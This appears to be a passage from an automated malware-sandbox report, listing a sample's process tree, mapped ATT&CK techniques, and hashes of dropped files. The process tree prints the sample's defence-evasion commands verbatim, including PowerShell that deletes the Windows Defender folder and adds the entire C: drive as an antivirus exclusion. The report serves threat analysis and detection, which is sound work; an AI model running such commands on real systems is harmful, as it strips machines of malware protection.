    "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
    3⤵
    - Executes dropped EXE
    - Access Token Manipulation: Create Process with Token
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:836
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Mjtbwkkhvk.vbs"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3064
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Passware Kit Forensic\KitForensic.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3616
- - C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
    C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
    3⤵
    - Executes dropped EXE
    PID:3768
- - C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
    C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bDYTxC3TXHqe.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2228
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4804
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3164
    - - C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3992
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 800 -s 2040
      4⤵
      Program crash
      PID:4048

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5008
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 4DA5CAD9BB5886349D3C0D68A47888A4 C
  2⤵
  - Loads dropped DLL
  - Drops file in System32 directory
  PID:1884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 800 -ip 800
1⤵
PID:1044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Impair Defenses

T1562

Modify Registry

T1112

System Binary Proxy Execution

T1218

Regsvcs/Regasm

T1218.009

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe

Filesize
88KB

MD5
17fc12902f4769af3a9271eb4e2dacce

SHA1
9a4a1581cc3971579574f837e110f3bd6d529dab

SHA256
29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

SHA512
036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSIC01.tmp

Filesize
3.4MB

MD5
4bef1140a7cadc194f2c20bff8f3b71d

SHA1
fa0e79b3dd1bad013c47ac8e0ded03216d044635

SHA256
a40a496fcfb6ab3935098e2158681e095dc83a66f3984aa01e1f0997208749da

SHA512
c2551a9b758d74d203c49c9bc185bd1dfc022d090718004536757fede4c6e4b8a014f385acc713ab94c83c45b1fbf0c6d5a6f559d4c0c29114344f1200ea0c32

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Filesize
63KB

MD5
0d5df43af2916f47d00c1573797c1a13

SHA1
230ab5559e806574d26b4c20847c368ed55483b0

SHA256
c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc

SHA512
f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_Mjtbwkkhvk.vbs

Filesize
201B

MD5
037e1750f892c1bc7d7e45d0e7735d57

SHA1
32d9b435ac76f32271fed9d602e723a64621bf36

SHA256
a1c60aeef9648ffc3619215635803794319570461d1c51994ad39610aeb6ad59

SHA512
59734b5e8f8ffe76288820ef5a538a3243a23fc085418d69015704372282b59d87c2a8c5a927d87db5bd53e6985f66db6c13d93409da7ea28fb96e7c178d8c82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bDYTxC3TXHqe.bat

Filesize
203B

MD5
7934bcc2aeba3653f7dd1e17aa8718d4

SHA1
caee6d564f75e258962a7be57f6afbb581c2d258

SHA256
6c0927052dc12173fd24ffcbb9bac846e3713f606e3c968603d4d36a2d76e548

SHA512
7ecb97a6ad07f33392f098e4aaf733211d5ab7b367b134fad8d4dc7c7c5942237d104158dc82204ad909b6ffc31db925fffff55b0d542e106d926a38fe9fc5db

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_yh4wn1j4.ooh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/800-90-0x00000000063D0000-0x00000000063E2000-memory.dmp

Filesize
72KB

Download
memory/800-91-0x0000000006910000-0x000000000694C000-memory.dmp

Filesize
240KB

Download
memory/800-71-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/800-93-0x0000000006CA0000-0x0000000006CAA000-memory.dmp

Filesize
40KB

Download
memory/836-44-0x0000018528370000-0x0000018528392000-memory.dmp

Filesize
136KB

Download
memory/1476-57-0x0000000005A60000-0x0000000005AC6000-memory.dmp

Filesize
408KB

Download
memory/1476-32-0x0000000000B10000-0x0000000000B60000-memory.dmp

Filesize
320KB

Download
memory/1476-38-0x00000000053D0000-0x00000000053EC000-memory.dmp

Filesize
112KB

Download
memory/1476-56-0x0000000006310000-0x00000000068B4000-memory.dmp

Filesize
5.6MB

Download
memory/1476-55-0x0000000005CC0000-0x0000000005D52000-memory.dmp

Filesize
584KB

Download
memory/1476-33-0x0000000002EA0000-0x0000000002EAA000-memory.dmp

Filesize
40KB

Download
memory/3616-88-0x00000000067A0000-0x00000000067BE000-memory.dmp

Filesize
120KB

Download
memory/3616-108-0x0000000007AD0000-0x0000000007AEA000-memory.dmp

Filesize
104KB

Download
memory/3616-89-0x00000000067D0000-0x000000000681C000-memory.dmp

Filesize
304KB

Download
memory/3616-77-0x0000000006100000-0x0000000006166000-memory.dmp

Filesize
408KB

Download
memory/3616-76-0x0000000005900000-0x0000000005922000-memory.dmp

Filesize
136KB

Download
memory/3616-74-0x0000000005A20000-0x0000000006048000-memory.dmp

Filesize
6.2MB

Download
memory/3616-94-0x0000000007970000-0x00000000079A2000-memory.dmp

Filesize
200KB

Download
memory/3616-95-0x00000000713C0000-0x000000007140C000-memory.dmp

Filesize
304KB

Download
memory/3616-105-0x0000000006D60000-0x0000000006D7E000-memory.dmp

Filesize
120KB

Download
memory/3616-106-0x00000000079B0000-0x0000000007A53000-memory.dmp

Filesize
652KB

Download
memory/3616-107-0x0000000008110000-0x000000000878A000-memory.dmp

Filesize
6.5MB

Download
memory/3616-87-0x00000000061E0000-0x0000000006534000-memory.dmp

Filesize
3.3MB

Download
memory/3616-109-0x0000000007B40000-0x0000000007B4A000-memory.dmp

Filesize
40KB

Download
memory/3616-110-0x0000000007D50000-0x0000000007DE6000-memory.dmp

Filesize
600KB

Download
memory/3616-111-0x0000000007CD0000-0x0000000007CE1000-memory.dmp

Filesize
68KB

Download
memory/3616-112-0x0000000007D00000-0x0000000007D0E000-memory.dmp

Filesize
56KB

Download
memory/3616-113-0x0000000007D10000-0x0000000007D24000-memory.dmp

Filesize
80KB

Download
memory/3616-114-0x0000000007E10000-0x0000000007E2A000-memory.dmp

Filesize
104KB

Download
memory/3616-115-0x0000000007DF0000-0x0000000007DF8000-memory.dmp

Filesize
32KB

Download
memory/3616-67-0x0000000002E90000-0x0000000002EC6000-memory.dmp

Filesize
216KB

Download
memory/3992-123-0x00000000002E0000-0x00000000002F2000-memory.dmp

Filesize
72KB

Download